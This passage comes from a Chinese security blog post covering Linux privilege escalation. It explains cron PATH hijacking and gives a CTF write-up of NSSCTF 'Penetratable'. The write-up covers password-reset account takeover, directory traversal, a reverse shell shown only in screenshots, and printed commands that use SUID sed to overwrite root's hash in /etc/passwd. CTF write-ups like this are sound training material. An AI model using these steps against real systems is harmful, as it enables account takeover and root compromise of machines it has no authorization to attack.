<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/tmp</span><br></pre></td></tr></table></figure>

<p>如果运行 <code>backup</code>，查找顺序是：</p>
<ol>
<li><code>/usr/local/sbin/backup</code></li>
<li><code>/usr/local/bin/backup</code></li>
<li><code>/sbin/backup</code></li>
<li><code>/bin/backup</code></li>
<li><code>/usr/sbin/backup</code></li>
<li><code>/usr/bin/backup</code></li>
<li><code>/tmp/backup</code></li>
</ol>
<p><strong>只要找到第一个匹配的可执行文件，就会立即执行，不会继续找</strong></p>
</blockquote>
<h5 id="如何确保执行我们的文件"><a href="#如何确保执行我们的文件" class="headerlink" title="如何确保执行我们的文件"></a>如何确保执行我们的文件</h5><ul>
<li><p><strong>方法一：利用 PATH 顺序</strong><br> 如果 PATH 中本来就有一个可写目录（例如 <code>/tmp</code>），并且它在真正命令所在目录的 <strong>前面</strong>，那么只要我们在里面放一个同名的恶意文件，就一定会被优先执行。</p>
</li>
<li><p><strong>方法二：修改 PATH</strong><br> 有时候 <code>/etc/crontab</code> 或脚本里会直接定义 PATH，比如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PATH=/tmp:/usr/bin:/bin</span><br></pre></td></tr></table></figure>

<p>那么 <code>/tmp</code> 会优先。<br> 如果我们能修改调用的脚本（或者配置文件），也能插入一个恶意 PATH。</p>
</li>
<li><p><strong>方法三：命令本身就是自定义的</strong><br> 如果 cron 任务里写的是 <code>backup</code>，而系统里本来就没有 <code>backup</code> 这个程序，那我们直接在 PATH 可写目录下放一个 <code>backup</code>，cron 就会默认用我们的</p>
</li>
</ul>
<h1 id="湖湘杯-2021-final-Penetratable"><a href="#湖湘杯-2021-final-Penetratable" class="headerlink" title="[湖湘杯 2021 final]Penetratable"></a>[湖湘杯 2021 final]Penetratable</h1><p>[<a target="_blank" rel="noopener" href="https://www.nssctf.cn/problem/978">湖湘杯 2021 final]Penetratable</a></p>
<p>这道题差不多可以当成渗透题目来做</p>
<p>拿到题目网址，先用dirsearch扫一手</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">Target: http://node4.anna.nssctf.cn:28861/</span><br><span class="line"></span><br><span class="line">[17:31:17] Starting:</span><br><span class="line">[17:31:20] 403 -  288B  - /.ht_wsr.txt</span><br><span class="line">[17:31:20] 403 -  288B  - /.htaccess.bak1</span><br><span class="line">[17:31:20] 403 -  288B  - /.htaccess.orig</span><br><span class="line">[17:31:20] 403 -  288B  - /.htaccess.sample</span><br><span class="line">[17:31:20] 403 -  288B  - /.htaccess.save</span><br><span class="line">[17:31:20] 403 -  288B  - /.htaccess_extra</span><br><span class="line">[17:31:20] 403 -  288B  - /.htaccess_orig</span><br><span class="line">[17:31:20] 403 -  288B  - /.htaccess_sc</span><br><span class="line">[17:31:20] 403 -  288B  - /.htaccessBAK</span><br><span class="line">[17:31:20] 403 -  288B  - /.htaccessOLD</span><br><span class="line">[17:31:20] 403 -  288B  - /.htm</span><br><span class="line">[17:31:20] 403 -  288B  - /.html</span><br><span class="line">[17:31:20] 403 -  288B  - /.htaccessOLD2</span><br><span class="line">[17:31:20] 403 -  288B  - /.htpasswd_test</span><br><span class="line">[17:31:20] 403 -  288B  - /.httr-oauth</span><br><span class="line">[17:31:20] 403 -  288B  - /.htpasswds</span><br><span class="line">[17:31:21] 403 -  288B  - /.php</span><br><span class="line">[17:31:29] 301 -  335B  - /app  -&gt;  http://node4.anna.nssctf.cn:28861/app/</span><br><span class="line">[17:31:29] 200 -  520B  - /app/</span><br><span class="line">[17:31:32] 301 -  338B  - /config  -&gt;  http://node4.anna.nssctf.cn:28861/config/</span><br><span class="line">[17:31:32] 200 -  487B  - /config/</span><br><span class="line">[17:31:42] 200 -    0B  - /phpinfo.php</span><br><span class="line">[17:31:46] 403 -  288B  - /server-status/</span><br><span class="line">[17:31:46] 403 -  288B  - /server-status</span><br><span class="line">[17:31:47] 301 -  338B  - /static  -&gt;  http://node4.anna.nssctf.cn:28861/static/</span><br><span class="line"></span><br><span class="line">Task Completed</span><br></pre></td></tr></table></figure>

<p>直接访问&#x2F;phpinfo.php无任何反应，空白页面</p>
<p>先注册一个账号，登录之后发现有修改密码功能，并且通过熊猫头插件扫出来的接口得知存在admin和root用户，直接访问会提示无权限</p>
<img src="../source/imgs/${fiilname}/image-20250815211555034.png" alt="image-20250815211555034" style="zoom:50%;" />

<p>用bp拦截下该重置密码的请求并将用户名改为admin，密码修改成功</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20250815212126812.png" alt="image-20250815212126812"></p>
<p>再将名字改为root尝试修改提示无权限</p>
<p>再登录admin账号，直接访问接口&#x2F;?c&#x3D;admin&amp;m&#x3D;updatePass，提示缺少参数</p>
<p>于是查看js文件，搜索updatePass()方法</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">updatePass</span>(<span class="params"></span>)&#123;</span><br><span class="line">    <span class="comment">// let name=encodeURIComponent(Base64.encode($(&quot;.input-group&gt;input&quot;).eq(0).val()))</span></span><br><span class="line">    <span class="comment">// let oldPass=$(&quot;.input-group&gt;input&quot;).eq(1).val()?hex_md5($(&quot;.input-group&gt;input&quot;).eq(1).val()):&#x27;&#x27;;</span></span><br><span class="line">    <span class="comment">// let newPass=$(&quot;.input-group&gt;input&quot;).eq(2).val()?hex_md5($(&quot;.input-group&gt;input&quot;).eq(2).val()):&#x27;&#x27;;</span></span><br><span class="line">    <span class="comment">// let saying=encodeURIComponent(Base64.encode($(&quot;.input-group&gt;input&quot;).eq(3).val()))</span></span><br><span class="line">    <span class="comment">// $.ajax(&#123;</span></span><br><span class="line">    <span class="comment">//     url: &#x27;/?c=admin&amp;m=updatePass&#x27;,</span></span><br><span class="line">    <span class="comment">//     type: &#x27;post&#x27;,</span></span><br><span class="line">    <span class="comment">//     data: &#x27;name=&#x27;+name+&#x27;&amp;newPass=&#x27;+newPass+&#x27;&amp;oldPass=&#x27;+oldPass+&#x27;&amp;saying=&#x27;+saying,</span></span><br><span class="line">    <span class="comment">//     // async:true,</span></span><br><span class="line">    <span class="comment">//     dataType: &#x27;text&#x27;,</span></span><br><span class="line">    <span class="comment">//     success: function(data)&#123;</span></span><br><span class="line">    <span class="comment">//         alertHandle(data);</span></span><br><span class="line">    <span class="comment">//     &#125;</span></span><br><span class="line">    <span class="comment">// &#125;);</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>补上相关参数后，尝试修改root密码，成功</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20250815212427917.png" alt="image-20250815212427917"></p>
<p>成功登录root账号，里面有一个查看日志的功能，并可以将该日志文件下载下来</p>
<p>拦截下载请求包，发送到repeater，发现返回包会直接返回文件内容</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20250815212640995.png" alt="image-20250815212640995"></p>
<p>于是尝试是否有目录遍历漏洞，就访问前面dirsearch扫出来的文件phpinfo.php，成功</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20250815213234991.png" alt="image-20250815213234991"></p>
<p>将md5序列拿去解密</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20250815213307838.png" alt="image-20250815213307838"></p>
<p>都明白了之后，直接反弹shell出来</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20250815213406495.png" alt="image-20250815213406495"></p>
<p>查看根目录发现访问flag文件需要root权限，并且只能读取不能进行其他操作</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20250815213501729.png" alt="image-20250815213501729"></p>
<p>进行suid提权，首先查看哪些文件有suid权限：<code>find / -perm -u=s -type f 2&gt;/dev/null</code></p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20250815213626831.png" alt="image-20250815213626831"></p>
<p>其中有&#x2F;bin&#x2F;sed我们可以进行利用，问手ai看看如何利用，成功读取flag</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/image-20250815213732730.png" alt="image-20250815213732730"></p>
<p>还有另外一种方法，如下所示：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">www-data@6aae652213e24b63:/var/www/html$ perl -le &#x27;print crypt(&quot;test&quot;,&quot;addedsalt&quot;)&#x27;</span><br><span class="line">adMpHktIn0tR2</span><br><span class="line">www-data@6aae652213e24b63:/var/www/html$ sed -i &#x27;s/root:x/root:adMpHktIn0tR2/g&#x27; /etc/passwd</span><br><span class="line">www-data@6aae652213e24b63:/var/www/html$ su</span><br><span class="line">Password: </span><br><span class="line">root@6aae652213e24b63:/var/www/html# cat /flag</span><br><span class="line">NSSCTF&#123;689a8f95-ec99-490e-8dbf-65f9df21d716&#125;</span><br></pre></td></tr></table></figure>

<h1 id="SUDO提权"><a href="#SUDO提权" class="headerlink" title="SUDO提权"></a><code>SUDO</code>提权</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo -l</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://gtfobins.github.io/">https://gtfobins.github.io/</a></p>
</article>
<div class="article-footer">
    <section id="license">
      <div class="header"><span>License</span></div>
      <div class="body"><p>本文采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">署名-非商业性使用-相同方式共享 4.0 国际</a> 许可协议，转载请注明出处。</p>
</div>
    </section>
    

</div>

<div class="related-wrap" id="read-next"><section class="body"><div class="item" id="prev"><div class="note">Newer</div><a href="/2025/08/20/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-initial/">春秋云镜-initial</a></div><div class="item" id="next"><div class="note">Older</div><a href="/2025/08/15/%E5%8F%8D%E5%BC%B9shell%E5%8D%87%E7%BA%A7%E4%B8%BA%E5%AE%8C%E5%85%A8%E4%BA%A4%E4%BA%92%E5%BC%8Fshell/">反弹shell升级为完全交互式shell</a></div></section></div>






<footer class="page-footer footnote"><hr><div class="text"><p>本站由 <a href="/">Sherlock</a> 使用 <a target="_blank" rel="noopener" href="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.33.1">Stellar 1.33.1</a> 主题创建。<br>本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议，转载请注明出处。</p>
</div></footer>
<div class="main-mask" onclick="sidebar.dismiss()"></div></div><aside class="l_right">
<div class="widgets">



<widget class="widget-wrapper toc" id="data-toc" collapse="false"><div class="widget-header dis-select"><span class="name">On This Page</span><a class="cap-action" onclick="sidebar.toggleTOC()" ><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg></a></div><div class="widget-body"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-text">参考</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Linux-suid%E6%8F%90%E6%9D%83"><span class="toc-text">Linux suid提权</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFsuid"><span class="toc-text">什么是suid</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E5%88%A9%E7%94%A8"><span class="toc-text">如何利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E8%AE%BE%E7%BD%AEsuid"><span class="toc-text">如何设置suid</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E6%9F%A5%E6%89%BEsuid%E6%96%87%E4%BB%B6"><span class="toc-text">如何查找suid文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%9B%E8%A1%8Csuid%E6%8F%90%E6%9D%83%EF%BC%88%E8%BF%99%E9%87%8C%E5%B0%B1%E8%AE%B0%E4%B8%80%E4%B8%AAfind%EF%BC%89"><span class="toc-text">进行suid提权（这里就记一个find）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#find"><span class="toc-text">find</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E5%A5%87%E5%A5%87%E6%80%AA%E6%80%AA%E7%9A%84%E6%8F%90%E6%9D%83"><span class="toc-text">一些奇奇怪怪的提权</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E6%9F%A5%E8%AF%A2%E5%8E%86%E5%8F%B2%E8%AE%B0%E5%BD%95%E4%BB%8E%E8%80%8C%E8%8E%B7%E5%BE%97%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84%E4%BF%A1%E6%81%AF"><span class="toc-text">通过查询历史记录从而获得信息泄露的信息</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#linux%E9%85%8D%E7%BD%AE%E9%94%99%E8%AF%AF%E4%BB%8E%E8%80%8C%E6%8F%90%E6%9D%83"><span class="toc-text">linux配置错误从而提权</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E6%8F%90%E6%9D%83"><span class="toc-text">计划任务提权</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E8%A6%86%E7%9B%96"><span class="toc-text">文件覆盖</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E5%8A%AB%E6%8C%81"><span class="toc-text">环境变量劫持</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E7%A1%AE%E4%BF%9D%E6%89%A7%E8%A1%8C%E6%88%91%E4%BB%AC%E7%9A%84%E6%96%87%E4%BB%B6"><span class="toc-text">如何确保执行我们的文件</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B9%96%E6%B9%98%E6%9D%AF-2021-final-Penetratable"><span class="toc-text">[湖湘杯 2021 final]Penetratable</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SUDO%E6%8F%90%E6%9D%83"><span class="toc-text">SUDO提权</span></a></li></ol></div><div class="widget-footer"><a class="top" onclick="util.scrollTop()"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><!-- Icon from Solar by 480 Design - https://creativecommons.org/licenses/by/4.0/ --><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="1.5"><path stroke-linejoin="round" d="m9 15.5l3-3l3 3m-6-4l3-3l3 3"/><path d="M7 3.338A9.95 9.95 0 0 1 12 2c5.523 0 10 4.477 10 10s-4.477 10-10 10S2 17.523 2 12c0-1.821.487-3.53 1.338-5"/></g></svg><span>Scroll to Top</span></a></div></widget>
</div></aside><div class='float-panel'>
  <button type='button' style='display:none' class='laptop-only rightbar-toggle mobile' onclick='sidebar.rightbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg>
  </button>
  <button type='button' style='display:none' class='mobile-only leftbar-toggle mobile' onclick='sidebar.leftbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-width="1.5"><path d="M2 11c0-3.771 0-5.657 1.172-6.828C4.343 3 6.229 3 10 3h4c3.771 0 5.657 0 6.828 1.172C22 5.343 22 7.229 22 11v2c0 3.771 0 5.657-1.172 6.828C19.657 21 17.771 21 14 21h-4c-3.771 0-5.657 0-6.828-1.172C2 18.657 2 16.771 2 13z"/><path id="sep" stroke-linecap="round" d="M5.5 10h6m-5 4h4m4.5 7V3"/></g></svg>
  </button>
</div>
</div><div class="scripts">


<script type="text/javascript">
  window.canonical = {"originalHost":null,"officialHosts":["localhost"],"encoded":""};
  const ctx = {
    date_suffix: {
      just: `Just`,
      min: `minutes ago`,
      hour: `hours ago`,
      day: `days ago`,
    },
    root : `/`,
    tag_plugins: {
      chat: Object.assign({"api":"https://siteinfo.listentothewind.cn/api/v1"}),
    }
  };

  // required plugins (only load if needs)
  if (`local_search`) {
    ctx.search = {};
    ctx.search.service = `local_search`;
    if (ctx.search.service == 'local_search') {
      let service_obj = Object.assign({}, `{"field":"all","path":"/search.json","content":true,"skip_search":null,"sort":"-date"}`);
      ctx.search[ctx.search.service] = service_obj;
    }
  }
  const def = {
    avatar: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/3442075.svg`,
    cover: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/cover/76b86c0226ffd.svg`,
    loading: `https://api.iconify.design/eos-icons:three-dots-loading.svg?color=%231cd0fd`,
  };
  const deps = {
    jquery: `https://gcore.jsdelivr.net/npm/jquery@3.7/dist/jquery.min.js`,
    marked: `https://gcore.jsdelivr.net/npm/marked@13.0/lib/marked.umd.min.js`,
    lazyload: `/%5Bobject%20Object%5D`
  }
  

</script>

<script type="text/javascript">
  
  function RunItem() {
    this.list = []; // 存放回调函数
    this.start = () => {
      for (var i = 0; i < this.list.length; i++) {
        this.list[i].run();
      }
    };
    this.push = (fn, name, setRequestAnimationFrame = true) => {
      let myfn = fn
      if (setRequestAnimationFrame) {
        myfn = () => {
          utils.requestAnimationFrame(fn)
        }
      }
      var f = new Item(myfn, name);
      this.list.push(f);
    };
    this.remove = (name) => {
      for (let index = 0; index < this.list.length; index++) {
        const e = this.list[index];
        if (e.name == name) {
          this.list.splice(index, 1);
        }
      }
    }
    // 构造一个可以run的对象
    function Item(fn, name) {
      // 函数名称
      this.name = name || fn.name;
      // run方法
      this.run = () => {
        try {
          fn()
        } catch (error) {
          console.log(error);
        }
      };
    }
  }

  const utils = {
    // 懒加载 css https://github.com/filamentgroup/loadCSS
    css: (href, before, media, attributes) => {
      var doc = window.document;
      var ss = doc.createElement("link");
      var ref;
      if (before) {
        ref = before;
      } else {
        var refs = (doc.body || doc.getElementsByTagName("head")[0]).childNodes;
        ref = refs[refs.length - 1];
      }
      var sheets = doc.styleSheets;
      if (attributes) {
        for (var attributeName in attributes) {
          if (attributes.hasOwnProperty(attributeName)) {
            ss.setAttribute(attributeName, attributes[attributeName]);
          }
        }
      }
      ss.rel = "stylesheet";
      ss.href = href;
      ss.media = "only x";
      function ready(cb) {
        if (doc.body) {
          return cb();
        }
        setTimeout(function () {
          ready(cb);
        });
      }
      ready(function () {
        ref.parentNode.insertBefore(ss, before ? ref : ref.nextSibling);
      });
      var onloadcssdefined = function (cb) {
        var resolvedHref = ss.href;
        var i = sheets.length;
        while (i--) {
          if (sheets[i].href === resolvedHref) {
            return cb();
          }
        }
        setTimeout(function () {
          onloadcssdefined(cb);
        });
      };
      function loadCB() {
        if (ss.addEventListener) {
          ss.removeEventListener("load", loadCB);
        }
        ss.media = media || "all";
      }
      if (ss.addEventListener) {
        ss.addEventListener("load", loadCB);
      }
      ss.onloadcssdefined = onloadcssdefined;
      onloadcssdefined(loadCB);
      return ss;
    },

    js: (src, opt) => new Promise((resolve, reject) => {
      var script = document.createElement('script');
      if (src.startsWith('/')) {
        src = ctx.root + src.substring(1);
      }
      script.src = src;
      if (opt) {
        for (let key of Object.keys(opt)) {
          script[key] = opt[key]
        }
      } else {
        // 默认异步，如果需要同步，第二个参数传入 {} 即可
        script.async = true
      }
      script.onerror = reject
      script.onload = script.onreadystatechange = function () {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    }),

    jq: (fn) => {
      if (typeof jQuery === 'undefined') {
        utils.js(deps.jquery).then(fn)
      } else {
        fn()
      }
    },

    onLoading: (el) => {
      if (el) {
        $(el).append('<div class="loading-wrap"><svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" stroke-opacity=".3" d="M12 3C16.9706 3 21 7.02944 21 12C21 16.9706 16.9706 21 12 21C7.02944 21 3 16.9706 3 12C3 7.02944 7.02944 3 12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="1.3s" values="60;0"/></path><path stroke-dasharray="15" stroke-dashoffset="15" d="M12 3C16.9706 3 21 7.02944 21 12"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.3s" values="15;0"/><animateTransform attributeName="transform" dur="1.5s" repeatCount="indefinite" type="rotate" values="0 12 12;360 12 12"/></path></g></svg></div>');
      }
    },
    onLoadSuccess: (el) => {
      if (el) {
        $(el).find('.loading-wrap').remove();
      }
    },
    onLoadFailure: (el) => {
      if (el) {
        $(el).find('.loading-wrap svg').remove();
        $(el).find('.loading-wrap').append('<svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" d="M12 3L21 20H3L12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.5s" values="60;0"/></path><path stroke-dasharray="6" stroke-dashoffset="6" d="M12 10V14"><animate fill="freeze" attributeName="stroke-dashoffset" begin="0.6s" dur="0.2s" values="6;0"/></path></g><circle cx="12" cy="17" r="1" fill="currentColor" fill-opacity="0"><animate fill="freeze" attributeName="fill-opacity" begin="0.8s" dur="0.4s" values="0;1"/></circle></svg>');
        $(el).find('.loading-wrap').addClass('error');
      }
    },
    request: (el, url, callback, onFailure) => {
      const maxRetry = 3;
      let retryCount = 0;

      return new Promise((resolve, reject) => {
        const load = () => {
          utils.onLoading?.(el);

          let timedOut = false;
          const timeout = setTimeout(() => {
            timedOut = true;
            console.warn('[request] 超时:', url);

            if (++retryCount >= maxRetry) {
              utils.onLoadFailure?.(el);
              onFailure?.();
              reject('请求超时');
            } else {
              setTimeout(load, 1000);
            }
          }, 5000);

          fetch(url).then(resp => {
            if (timedOut) return;
            clearTimeout(timeout);

            if (!resp.ok) throw new Error('响应失败');
            return resp;
          }).then(data => {
            if (timedOut) return;
            utils.onLoadSuccess?.(el);
            callback(data);
            resolve(data);
          }).catch(err => {
            clearTimeout(timeout);
            console.warn('[request] 错误:', err);

            if (++retryCount >= maxRetry) {
              utils.onLoadFailure?.(el);
              onFailure?.();
              reject(err);
            } else {
              setTimeout(load, 1000);
            }
          });
        };

        load();
      });
    },
    requestWithoutLoading: (url, options = {}, maxRetry = 2, timeout = 5000) => {
      return new Promise((resolve, reject) => {
        let retryCount = 0;

        const tryRequest = () => {
          let timedOut = false;
          const timer = setTimeout(() => {
            timedOut = true;
            if (++retryCount > maxRetry) reject('timeout');
            else tryRequest();
          }, timeout);

          fetch(url, options)
            .then(resp => {
              clearTimeout(timer);
              if (!resp.ok) throw new Error('bad response');
              resolve(resp);
            })
            .catch(err => {
              clearTimeout(timer);
              if (++retryCount > maxRetry) reject(err);
              else setTimeout(tryRequest, 500);
            });
        };

        tryRequest();
      });
    },
    /********************** requestAnimationFrame ********************************/
    // 1、requestAnimationFrame 会把每一帧中的所有 DOM 操作集中起来，在一次重绘或回流中就完成，并且重绘或回流的时间间隔紧紧跟随浏览器的刷新频率，一般来说，这个频率为每秒60帧。
    // 2、在隐藏或不可见的元素中，requestAnimationFrame 将不会进行重绘或回流，这当然就意味着更少的的 cpu，gpu 和内存使用量。
    requestAnimationFrame: (fn) => {
      if (!window.requestAnimationFrame) {
        window.requestAnimationFrame = window.requestAnimationFrame || window.mozRequestAnimationFrame || window.webkitRequestAnimationFrame;
      }
      window.requestAnimationFrame(fn)
    },
    dark: {},
  };

  // utils.dark.mode 当前模式 dark or light
  // utils.dark.toggle() 暗黑模式触发器
  // utils.dark.push(callBack[,"callBackName"]) 传入触发器回调函数
  utils.dark.method = {
    toggle: new RunItem(),
  };
  utils.dark = Object.assign(utils.dark, {
    push: utils.dark.method.toggle.push,
  });
</script>
<script>
  const sidebar = {
    leftbar: () => {
      if (l_body) {
        l_body.toggleAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    rightbar: () => {
      if (l_body) {
        l_body.toggleAttribute('rightbar');
        l_body.removeAttribute('leftbar');
      }
    },
    dismiss: () => {
      if (l_body) {
        l_body.removeAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    toggleTOC: () => {
      document.querySelector('#data-toc').classList.toggle('collapse');
    }
  }
</script>
<script type="text/javascript">
  (() => {
    const tagSwitchers = document.querySelectorAll('.tag-subtree.parent-tag > a > .tag-switcher-wrapper')
    for (const tagSwitcher of tagSwitchers) {
      tagSwitcher.addEventListener('click', (e) => {
        const parent = e.target.closest('.tag-subtree.parent-tag')
        parent.classList.toggle('expanded')
        e.preventDefault()
      })
    }

    // Get active tag from query string, then activate it.
    const urlParams = new URLSearchParams(window.location.search)
    const activeTag = urlParams.get('tag')
    if (activeTag) {
      let tag = document.querySelector(`.tag-subtree[data-tag="${activeTag}"]`)
      if (tag) {
        tag.querySelector('a').classList.add('active')
        
        while (tag) {
          tag.classList.add('expanded')
          tag = tag.parentElement.closest('.tag-subtree.parent-tag')
        }
      }
    }
  })()
</script>

<script async src="https://gcore.jsdelivr.net/npm/vanilla-lazyload@19.1/dist/lazyload.min.js"></script>
<script>
  // https://www.npmjs.com/package/vanilla-lazyload
  // Set the options globally
  // to make LazyLoad self-initialize
  window.lazyLoadOptions = {
    elements_selector: ".lazy",
    callback_loaded: (el) => {
      el.classList.add('loaded');
      const wrapper = el.closest('.lazy-box');
      const icon = wrapper?.querySelector('.lazy-icon');
      if (icon) icon.remove();
    }
  };
  // Listen to the initialization event
  // and get the instance of LazyLoad
  window.addEventListener(
    "LazyLoad::Initialized",
    function (event) {
      window.lazyLoadInstance = event.detail.instance;
    },
    false
  );
  document.addEventListener('DOMContentLoaded', function () {
    window.lazyLoadInstance?.update();
  });

  window.wrapLazyloadImages = (container) => {
    if (typeof container === 'string') {
      container = document.querySelector(container);
    }
    if (!container) return;
    
    const images = container.querySelectorAll('img');
    images.forEach((img) => {
      if (img.classList.contains('lazy')) return;

      const src = img.getAttribute('src');
      if (!src) return;

      const wrapper = document.createElement('div');
      wrapper.className = 'lazy-box';

      const newImg = img.cloneNode();
      newImg.removeAttribute('src');
      newImg.setAttribute('data-src', src);
      newImg.classList.add('lazy');

      const icon = document.createElement('div');
      icon.className = 'lazy-icon';
      if (def.loading) {
        icon.style.backgroundImage = `url("${def.loading}")`;
      }

      wrapper.appendChild(newImg);
      wrapper.appendChild(icon);

      img.replaceWith(wrapper);
    });

    // 通知 LazyLoad 更新
    if (window.lazyLoadInstance?.update) {
      window.lazyLoadInstance.update();
    }
  }
  
</script>

<!-- required -->
<script src="/js/main.js?v=1.33.1" defer></script>

<script type="text/javascript">
  const applyTheme = (theme) => {
    if (theme === 'auto') {
      document.documentElement.removeAttribute('data-theme')
    } else {
      document.documentElement.setAttribute('data-theme', theme)
    }

    // applyThemeToGiscus(theme)
  }

  // FIXME: 这会导致无法使用 preferred_color_scheme 以外的主题
  const applyThemeToGiscus = (theme) => {
    // theme = theme === 'auto' ? 'preferred_color_scheme' : theme
    const cmt = document.getElementById('giscus')
    if (cmt) {
      // This works before giscus load.
      cmt.setAttribute('data-theme', theme)
    }

    const iframe = document.querySelector('#comments > section.giscus > iframe')
    if (iframe) {
      // This works after giscus loaded.
      const src = iframe.src
      const newSrc = src.replace(/theme=[\w]+/, `theme=${theme}`)
      iframe.src = newSrc
    }
  }

  const switchTheme = () => {
    // light -> dark -> auto -> light -> ...
